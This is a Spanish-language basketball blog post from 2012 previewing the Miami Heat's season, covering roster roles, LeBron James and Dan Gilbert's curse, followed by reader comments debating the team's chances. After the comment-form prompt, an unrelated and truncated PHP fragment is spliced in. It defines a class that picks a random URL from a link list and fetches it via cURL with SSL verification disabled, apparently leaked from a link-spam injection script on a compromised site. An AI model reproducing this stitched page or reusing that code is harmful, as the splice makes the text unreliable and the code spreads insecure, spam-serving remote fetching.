Miami Heat: Con la maldición a cuestas

15 de January de 2012 por Sancho88

Jules Winnfield empuñaba su arma de fuego, una Star Model B de color plateado, mientras recitaba un pasaje bíblico que servía como preludio para las muertes por encargo en ‘Pulp Fiction’. Su alegato rezaba así:

“El camino del hombre recto está por todos lados rodeado por las injusticias de los egoístas y la tiranía de los hombres malos. Bendito sea aquel pastor que en nombre de la caridad y de la buena voluntad, saque a los débiles del valle de la oscuridad, pues ese es el verdadero guardián de su hermano y el descubridor de los niños perdidos. Y os aseguro que vendré a castigar con gran venganza y furiosa cólera a aquellos que pretendan envenenar y destruir a mis hermanos. Y tú sabrás que mi nombre es Yavéh, cuando caiga mi venganza sobre ti”.

Algo más o menos parecido le ocurrió a Lebron James en su traumática salida de los Cavaliers. Estas fueron las palabras que Dan Gilbert le dedicó en una carta escrita en Comic Sans:

“Personalmente garantizo que los Cleveland Cavaliers ganarán un campeonato de la NBA antes de que el asimismo proclamado ‘King’ consiga uno”.

Aun sin conocer las preferencias culinarias de Gilbert, que no sabemos si considera una ‘porquería’ echarle mayonesa a las patatas fritas, realmente es un morbo añadido para Lebron y los suyos superar tan estúpida rabieta y llevarse por fin el anillo. Como bien se ha comentado en esta página, a los 28 años ‘su majestad’ consiguió su primer anillo. ¿Adivinan cuántos años tiene James actualmente? 27. Por tanto, que no cunda el pánico sobre ‘King’ James. Aunque los 80 eran otros tiempos (Larry Bird, ‘Magic’ Johnson, los ‘Bad Boys’… Rivales terribles) la carrera de Lebron llega a su mejor momento y es muy dudoso que aún no le queden 7-8 años de buen baloncesto para llevarse algunos anillos a su casa (por mucho que le pese a Dan Gilbert).

Los Heat tienen una pinta terrible. Han superado sus taras, sus miedos, sus filias y sus fobias. Ya tienen director. Y no solo uno, sino varios. El pique sano entre Mario Chalmers y Norris Cole es tal, que apenas se miran a la cara cuando uno sustituye al otro. Y eso es bueno. La irrupción en la liga del joven ‘rookie’ –vivan las casualidades y el ‘recochineo’, también nació en el estado de Ohio– ha abierto un debate intenso, tanto en la prensa como entre los aficionados, acerca de quién debería llevar el timón. Son dos estilos totalmente distintos. Mientras Chalmers es un jugador más físico, con mejor tiro exterior y defensa, Norris Cole es la imaginación, el director clásico, el repartidor de pizzas del equipo. Ambos estilos favorecen a los ‘Beach Boys’, ansiosos como estaban de asistencias para sus estadísticas. Atrás dejan la versión desequilibrada y sin timón. Atrás dejan a Mike Bibby y Carlos Arroyo, incapaces de guiar una nave de tales dimensiones la pasada temporada. Digamos que Mario Chalmers es, por galones, el capitán de la tripulación, y Norris Cole su contramaestre. Como Magallanes y Vasco de Gama, los roles hasta ahora están definidos. No sabemos qué pasará al final del viaje.

En las alas del equipo continúa la dirección del mismo. Dwyane Wade y Lebron James son perfectamente capaces de marcar jugadas y ejecutarlas, de tomar el timón momentáneamente. En ese sentido, los Heat se convierten, probablemente, en el equipo más difícil de defender de la liga por toda la variedad táctica y todos los recursos en ataque que pueden desplegar. Hasta cuatro hombres (James, Wade, Chalmers y Cole) son capaces de generar juego, de marcar la jugada y llevarla a cabo. Cada uno aportando sus características particulares. Lebron James cada año es más jugador de equipo y es una delicia comprobar cómo ha ido creciendo su juego colectivo año tras año. Por su parte, Dwyane ‘Flash’ Wade posee una de las técnicas individuales más brutales de la liga, y su arma más temida es el “crossover” penetrando en el 1 contra 1, cambiando el bote hacia su mano izquierda, con la que finalmente penetra, para acabar de nuevo con su mano derecha, doblar el tiro, o forzar una personal. No hace falta decir mucho más de 2 jugadores franquicia que comparten vestuario. Ambos saben a qué juegan y por qué juegan juntos y además se entienden a la perfección. Sólo faltaría resolver ciertos desajustes en los minutos finales de un partido igualado. ¿Quién debe jugárselas?

El juego exterior de Miami lo completan el también ‘rookie’ Terrel Harris, el alero James Jones y el veterano Shane Battier. Harris y Jones le darán buenos minutos de descanso a Wade. El escolta de la Universidad de Oklahoma State está siendo una de las sorpresas más agradables de los Heat en este inicio de temporada, junto a Norris Cole. Peleará con James Jones por ser la opción preferente para su entrenador a la hora de dar descanso a Wade. Jones conoce bien el equipo, pues esta será su cuarta temporada en el mismo. A pesar de que durante sus 9 años en la liga apenas ha promediado 5,3 puntos, Jones es un especialista en tiro. Tiene buenos porcentajes tanto en tiros de dos como en triples, muy cercanos al 50% esta temporada. Mientras, Battier será el complemento perfecto para aportar defensa y tiro exterior desde el banquillo. El alero fue una de las claves la pasada temporada de los Memphis Grizzlies en su camino a semifinales de Conferencia Oeste, y parece un fichaje muy acertado como recambio de Lebron James. Toda una garantía para los Heat por su veteranía y conocimiento del juego.

El juego interior es propiedad del ala-pívot texano Chris Bosh. Su rol ha cambiado mucho desde que abandonara los Raptors. Ahora es un jugador mucho menos ‘chupón’ (las circunstancias se lo exigen), y selecciona mejor sus tiros. Su principal amenaza sigue siendo el tiro de media distancia, aunque no acaba de solucionar su ‘alergia’ a la pintura. Defensivamente no se encuentra entre los diez mejores jugadores de la liga, pero lo suple con su liderazgo en ataque. Es la tercera opción después de Lebron y Wade, y puede asumir el peso del equipo cuando ellos no están en la cancha. Su sustituto será un año más Udonis Haslem, quizá, el único especialista defensivo de la plantilla junto con Battier. Ha jugado toda su carrera en los Heat, y junto a Dwayne Wade es el único superviviente de la plantilla que conquistó el título en 2006. Un tipo muy fiable que esta temporada está atrapando más de 10 rebotes por partido, su mejor media de siempre. Joel Anthony les acompañará en la zona. El voluntarioso jugador canadiense se limita a defender y cometer faltas, aunque no tiene ‘mala mano’. Entre estos 3 jugadores se repartirán los minutos dejando a Dexter Pittman, Juwan Howard, que siempre termina en el fondo de la rotación de alguno de los grandes, y Mickell Gladness, los minutos de la basura. Habrá que ver en que condiciones vuelve Eddie Curry de la lesión que le ha impedido debutar con los Heat. Sin ninguna duda, el puesto de ‘5’ sigue siendo el de peor calidad de los Heat, su punto débil. Precisamente, los Mavericks lo aprovecharon en las finales del año pasado, y tanto Nowitzki como Chandler cuajaron grandes partidos ante la zona de los Heat. .

No podemos olvidarnos del señor Mike Miller. El año pasado iba a ser junto a Eddie House y Jerry Stackhouse la mano ejecutora desde el banquillo, y le pusieron un contrato suculento sobre la mesa: 30 millones por 5 años, que representan algo más de 10 millones de diferencia con respecto al salario que supuestamente se iban a ahorrar con Michael Beasley. Mandaron al propio Beasley a los ‘Wolves’ y confiaron en Mike Miller. A pesar de los pesares, Michael Beasley sigue siendo un jugador aprovechable para su equipo en comparación con el ex escolta de los Wizards. Parece que Pat Riley se equivocó de facto en este traspaso, teniendo en cuenta que su contrato se extiende hasta 2015. ¿Alguien quiere a Mike Miller?

Estos son los Heat de Riley. El año pasado dieron un golpe sobre la mesa y se llevaron todas las fichas que había, y esta temporada las han reforzado muy bien en el juego exterior, no tanto en la pintura. La retirada de Ilgauskas fue un golpe duro para ellos, ya que para Lebron era un jugador fundamental en el equipo. ¿Podrán ganar los Heat el anillo con una posición huérfana dentro del roster? Todo hace indicar que sí. El ‘Rey’ sin trono tiene una oportunidad única para borrar su particular maldición y reinar en una liga que ha rozado hasta en dos ocasiones. Dicen que a la tercera va la vencida.

Quinteto: Mario Chalmers, Dwayne Wade, Lebron James, Chris Bosh, Joel Anthony.
Sexto hombre: Udonis Haslem / Norris Cole.

Previsión: Campeones de la NBA. (47-19) en temporada regular

 

Comenta

19 comentarios a esta entrada

  1. shaggy dice:
    #1

    A mi me sigue pareciendo que Bron y Wade no son compatibles, que los dos acaparan mucha pelota y que Bosh solo rinde cuando los otros no estan o falta uno de ellos.
    En cuanto al tema de quien debe jugarse la “patata caliente” esta claro que deberia ser para Wade, que es el unico que ha demostrado en estos años, que es determinante en los momentos finales del partido. Porque a la vista esta que Bron no es un matador de partidos salvo en contadas ocasiones.

      Citar

  2. simon dice:
    #2

    No se en que estado se encuentra, pero para mi un fichaje buenisimo para estos Heat sería Joel Pryzbilla.

      Citar

  3. Denise dice:
    #3

    El mejor equipo de la competición y candidato número uno al anillo.

    A pesar de la falta de calidad de sus Centers, entre Joel Anthony, Udonis Haslem (fenomenal jugador de equipo), Juwan Howard y Curry se pueden apañar para ofrecer 48 minutos decentes como “5”. Incluso a unas malas, Bosh podría jugar en esa posición según qué rival y circunstancias.
    Además se encuentran con un chollo de base, el “robo” del Draft Norris Cole, que le asegura buena dirección y tener el puesto de “1” bien cubierto entre él y Chalmers.

    Y yo sí confío en Mike Miller. Cobra bastante e incluso no sería mala idea el amnistiarlo el año que viene, pero éste y James Jones en un momento dado te la lían a triples. Sinceramente, el Mike Miller de los Magic y de los Grizzlies me encantaba y si los Heat se llevasen el anillo, sólo me alegraría por él y por Haslem.

      Citar

  4. HisRoyalAirness dice:
    #4

    jajaja bravo Sancho!
    Muy fresco, divertido y técnico. Análisis cojonudo.
    Con la pipa de Jules me ganaste.

    Para mí son candidatos número 1 pero porque los demás potenciales rivales se han debilitado solitos (Lakers, Mavs), han envejecido (Celtics, Spurs) o les falta experiencia (Thunder). No creo que sean de los mejores equipos de los últimos años ni de lejos pero van a aprovecharse del bajón general de calidad.

    Unico problema real? Los Bulls y las zonas defensivas que puede plantarles Thibodeau en PO. Aunque sigo pensando que Boozer no da la talla para ser segunda espada de un candidato real al anillo

      Citar

  5. German dice:
    #5

    Ojala me equivoque, pero no veo a los Bulls eliminandolos y del Oeste al Thunder le jugara una mala pasada la falta de experiencia. Ya la temporada pasada eran candidatos y en esta lo son aun mas, principalmente porque ya llevan un año jugando juntos y tambien la aportacion defensiva de Battier puede ser crucial en playoffs.
    Y como bonus consiguieron el robo del draft.

      Citar

  6. melo15 dice:
    #6

    Bueno pero tiene a un Pivot ( Noah) que puede hacer estragos en el juego interior de los Bulls, eso y Taj Gibson que tiene una pinta de repartir que no veas, puede hacer que Bosh se cague en los pantalones.

      Citar

  7. Sancho88 dice:
    #7

    Gracias Airness!! es que me pongo a hacer los análisis a las tantas y se me ocurren muchas paridas, xd. seguro que tú también has visionado a Gilbert con la pipa de Jules haciéndole el cántico a Lebron James… Y SABRÁS QUE MI NOMBRE ES…. DAN GILBERT!! xd. ese hombre está a mil jodidas millas de estar bien, carta por aquí, carta por allá… magic queremos reflexiones al borde de la bocina, ejem. jejeje.

    A ver, el tema de este equipo es que Spoelstra tiene que saber administrar la calidad de la que dispone en ataque. No puede ser que se las juegue todas Lebron, porque se vuelven demasiado predecibles, y si una cosa pueden tener estos tíos, es muchísima variedad táctica en ataque. Deberían aprovechar a Lebron, Wade, Chalmers, Cole… gente que tiene mano. que no son lakers q solo tienen a Kobe desde fuera. No sé, con esas amenazas, más Bosh, que es un poco el hombre combo, tendrían que ser una pesadilla para los rivales. Sobre lo que comentáis de Miller… pues todos queremos ver al Miller de los Wolves, que era un auténtico jugón. Pero lo único que le vemos es en el banquillo pasándoselo de puta madre. Y lo que comenta Denise, totalmente de acuerdo. Bosh debería ser el cinco del equipo, ya que no hay otro a la altura. Pau ya lo fue en Grizzlies, y él mismo en Toronto con Bargnani de 4. Un tío con dos pelotas, un líder de verdad, lo haría. Señor Spoelstra, póngame de cinco y a Haslem y Battier rotando de 4. Porque si no, el equipo es un desastre en defensa interior, y ahí le pueden matar Bulls y hasta unos Magic inspirados

      Citar

  8. Toni dice:
    #8

    Gran analisis Sancho, muy divertido y fluido de leer, si señor!
    Como Curry vuelva a ser “jugador de baloncesto”, anillo seguro.

      Citar

  9. Sancho88 dice:
    #9

    gracias toni!! si Curry vuelve a ser jugador de baloncesto, yo me apunto a árabe o chino. palabra. xd.

      Citar

  10. HisRoyalAirness dice:
    #10

    Sancho88:
    Gracias Airness!! es que me pongo a hacer los análisis a las tantas y se me ocurren muchas paridas, xd. seguro que tú también has visionado a Gilbert con la pipa de Jules haciéndole el cántico a Lebron James… Y SABRÁS QUE MI NOMBRE ES…. DAN GILBERT!! xd. ese hombre está a mil jodidas millas de estar bien, carta por aquí, carta por allá… magic queremos reflexiones al borde de la bocina, ejem. jejeje.

    A ver, el tema de este equipo es que Spoelstra tiene que saber administrar la calidad de la que dispone en ataque. No puede ser que se las juegue todas Lebron, porque se vuelven demasiado predecibles, y si una cosa pueden tener estos tíos, es muchísima variedad táctica en ataque. Deberían aprovechar a Lebron, Wade, Chalmers, Cole… gente que tiene mano. que no son lakers q solo tienen a Kobe desde fuera. No sé, con esas amenazas, más Bosh, que es un poco el hombre combo, tendrían que ser una pesadilla para los rivales. Sobre lo que comentáis de Miller… pues todos queremos ver al Miller de los Wolves, que era un auténtico jugón. Pero lo único que le vemos es en el banquillo pasándoselo de puta madre. Y lo que comenta Denise, totalmente de acuerdo. Bosh debería ser el cinco del equipo, ya que no hay otro a la altura. Pau ya lo fue en Grizzlies, y él mismo en Toronto con Bargnani de 4. Un tío con dos pelotas, un líder de verdad, lo haría. Señor Spoelstra, póngame de cinco y a Haslem y Battier rotando de 4. Porque si no, el equipo es un desastre en defensa interior, y ahí le pueden matar Bulls y hasta unos Magic inspirados

    Yo no puedo visionar a Dan Gilbert en esa escena porque, sencillamente, Samuel L. Jackson es demasiado jefe como para sustituirlo por semejante pringao jajaja

    La idea de Bosh como 5 sobre el papel está muy bien pero el tipo tiene menos ganas de pelea que nadie. No sirve para imponerse bajo el aro y además su juego de espaldas es bastante limitado.

    Si pudiesen hacer algo similar lo ideal sería poner de vez en cuando a Lebron de falso 4, como hacía en Cleveland, y hacer mucho más daño en transición (aún)

      Citar

  11. Esteban dice:
    #11

    creo q el fracaso del año pasado los libero, ya esta a fracasaron, parecia q no podian hacerlo y lo hicieron, creo q ahora estan algo mas liberado

      Citar

  12. Esteban dice:
    #12

    ah y beasley no es un jugador productivo, es un proyecto molesto que salio barato y por eso los wolves no renuncian a el, aun…

      Citar

  13. melo15 dice:
    #13

    Lo mismo pasa con Oden aunque por razones diferentes, renuncian a venderlo, porque tiene esperanzas de que aun pueden explotar, al igual que Randolph, Flynn, Bayless, una pena.
    Alguien me puede decir, porque, por ejemplo, un jugador xomo Flynn, una mas que aceptable temporada Rookie, se lesiona en la temporada Sophmore y ya esta!! Ya no sera el de antes, porque??

      Citar

  14. Nacho dice:
    #14

    Yo no veo a Bosh de 5, demasiado blando, y demasiado cerca del aro tendría que estar.
    Reconozco que los Heat me caen anipáticos, gracias a LeBron y al propio Bosh, por eso igual no soy justo con ellos. Tampoco los he visto mucho. Me aburren. Además creo que es el equipo que más infracciones no señaladas cometen. Y eso me hace odiarlos aún más. LeBron, empero, es un abusón. Abusa de lo bueno que es, y abusa de que no le pitan casi nada (pasos, faltas de ataque)
    Eso sí, tienen algo que mola: Wade. Que no se por qué, pero me cae simpático. Probablemente porque es un placer verlo jugar. Para mí es más estético que LeBron.
    Y creo también, que son favoritos nº1 al título. Pero sueño que no sea así. Y mi sueño se fundamenta en sus carencias. Pocas, pero las tiene. A las ya dichas del juego interior añadiría su problema para cerrar los partidos. Suelen ganarlos por aplastamiento. En eso son los mejores, pero si el rival aguanta y pone una buena defensa, les crea problemas. Y su verdadero problema es el ataque estático de los minutos finales. Es ya sabido que LeBron baja considerablemente su rendimiento en el último cuarto, y aún así amasa la bola. Y eso crea indefinición en Wade, mucho mejor finalizador. Incluso Bosh es mucho más seguro para jugarse la patata caliente. Si afinan esos últimos cuartos lo tienen en su mano.
    Aunque creo que el problema de Wade es aún mayor, no encuentra su sitio. Y será muy colega del otro, pero no hay feeling, como decía Guardiola de Etoo. Es bueno, es simpático, nos cae bien,pero… Supongo que saldrá este año de allí. ¿Os lo imagináis en Minnesota con Love y Rubio?

    Por otra parte buen análisis, Sancho. Sabía que eras un friki, pero también eres leído. Y no hay nada pero que un friki, leído y que le mole el baloncesto, ¿qué vas a hacer a los cuarenta?

      Citar

  15. Nacho dice:
    #15

    ese último pero es un PEOR. Sorry

      Citar

  16. melo15 dice:
    #16

    Wade a Minnesota??? Las ganas, pero si no tiene nada esa ciudad.
    No creo que Lebron se a un mal cerrador de partidos la verdad, lo que pasa esque cuando tiene mucha presion no lo hace bien, pero mucha, pir ejemplo finales de conf. Finales, porque en la temporada regular, no creo que le cueste.

      Citar

  17. Sancho88 dice:
    #17

    Nacho:
    Yo no veo a Bosh de 5, demasiado blando, y demasiado cerca del aro tendría que estar.
    Reconozco que los Heat me caen anipáticos, gracias a LeBron y al propio Bosh, por eso igual no soy justo con ellos. Tampoco los he visto mucho. Me aburren. Además creo que es el equipo que más infracciones no señaladas cometen. Y eso me hace odiarlos aún más. LeBron, empero, es un abusón. Abusa de lo bueno que es, y abusa de que no le pitan casi nada (pasos, faltas de ataque)
    Eso sí, tienen algo que mola: Wade. Que no se por qué, pero me cae simpático. Probablemente porque es un placer verlo jugar. Para mí es más estético que LeBron.
    Y creo también, que son favoritos nº1 al título. Pero sueño que no sea así. Y mi sueño se fundamenta en sus carencias. Pocas, pero las tiene. A las ya dichas del juego interior añadiría su problema para cerrar los partidos. Suelen ganarlos por aplastamiento. En eso son los mejores, pero si el rival aguanta y pone una buena defensa, les crea problemas. Y su verdadero problema es el ataque estático de los minutos finales. Es ya sabido que LeBron baja considerablemente su rendimiento en el último cuarto, y aún así amasa la bola. Y eso crea indefinición en Wade, mucho mejor finalizador. Incluso Bosh es mucho más seguro para jugarse la patata caliente. Si afinan esos últimos cuartos lo tienen en su mano.
    Aunque creo que el problema de Wade es aún mayor, no encuentra su sitio. Y será muy colega del otro, pero no hay feeling, como decía Guardiola de Etoo. Es bueno, es simpático, nos cae bien,pero… Supongo que saldrá este año de allí. ¿Os lo imagináis en Minnesota con Love y Rubio?

    Por otra parte buen análisis, Sancho. Sabía que eras un friki, pero también eres leído. Y no hay nada pero que un friki, leído y que le mole el baloncesto, ¿qué vas a hacer a los cuarenta?

    Espero seguir siendo un friki, pero con familia. jajaajaj. no sé, creo que a muchos nos gustan los reportajes de gonzalo vázquez, para mí es un referente sobre cómo contar historias. simplemente insuperable. ya le he dicho a Txus que si alguien se le ocurre alguna historia no me importaría currarme un reportaje intentando hacer algo parecido. Y espero que todos sigamos siendo frikis del baloncesto, ese deporte de enfermos que yo siempre he dicho que tienen más clase que los seguidores del fútbol. es una opinión

      Citar

  18. GreenPride dice:
    #18

    El equipo seguido por todos y amado por muy pocos, el que soporta toda la presión y tiene que ganar el campeonato sí o sí. La verdad es que estos Heat son los máximos favoritos al anillo por calidad de sus estrellas pero aún dan síntomas de alguna debilidad que hacen concebir esperanzas a otros equipos. En la lucha por el anillo coincido en que la mayoría de los aspirantes se han debilitado (Lakers seguro, ya veremos los Mavs) o están viejos (Celtics, Spurs) por eso creo que quedan sólo 2 o 3 equipos que les puedan parar Bulls, Thunder y quizá Mavs.
    En su juego, por los partidos que les he visto parece que han entendido que LeBron o Wade tienen que moverse más cerca del aro que haciendo tiros exteriores y están explotándolos más dentro. Creo que es un acierto y que tiren de lejos cuando estén enchufados. Clave en PO el rendimiento de los interiores. Si Curry hace un año decente (muy dudoso) son seguro máximos favoritos, si no ya veremos si Bosh puede con todo aunque al menos sus principales rivales excepto los Mavs de Dirk no tienen grandes amenazas interiores.
    Sinceramente creo que será el año en que veremos coronado a LeBron de la mano de Flash pero ya veremos. Por mi parte me encantaría que no fuera así.

      Citar

  19. portu dice:
    #19

    Pues siendo seguidor de los Celtics y aunque parezca raro, ni me cae mal Miami ni me cae mal Lebron. Que se me entienda, prefiero un juego de ataque fluido, con pases, con implicación del máximo nº de jugadores, tampoco es q me gusten precisamente los equipos centrados en sus estrellas, pero es q la NBA es así… lo fomenta. Te puede caer peor Lebron por lo q dice o deja de decir, pero no por lo q hace en la cancha jugando a baloncesto… si no te gusta Lebron, tampoco te puede gustar Durant, ni Kobe, ni Rose, ni Wade, ni Carmelo, ni unos cuantos más… El problema de Lebron es q tiene tal dominio físico sólo comparable al q ejercía Shaq sobre pivots rivales (se le acercan en la actualidad Rose sobre bases rivales y D. Howard sobre pivots), todo ello gracias a la conjunción de velocidad, fuerza y coordinación. Particularmente me parece un tío q acapara bola, pero menos q otras estrellas como las q he nombrado, se trata de un jugador más completo y a la hora de pasar el balón y tener visión de juego lo veo superior a muchos de estos, vamos a la mayoría. Luego, pues es cierto q estéticamente no es lo mismo ver una suspensión suya q ver un fade away de Kobe o un tiro de Durant, en ese punto estoy de acuerdo, pero tampoco creo q eso debe hacer q se le coja manía. Violaciones q no le pitan??? alguien ha dicho eso y me parece poco acertado, yo creo q le dejan de pitar muchas faltas a favor, igual q le sucede a D. Howard, creo q jugadores como Wade o Kobe están mucho más protegidos… y si hablamos de pasos de salida, pues lo mismo, Rose sin ir más lejos o Rondo, q son bases, pegan 2 y 3 pasos muchísimas veces antes de dar el primer bote.
    Para mi favoritos claros al título. Tienen mucho talento y este año no van a cometer los errores del año pasado, además han añadido varias piezas interesantes, sobretodo Cole y un Haslem bien desde el principio, tampoco creo q los Mavs u otro equipo vuelvan a demostrar el nivel de los playoffs pasados en cuanto a acierto en el tiro.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>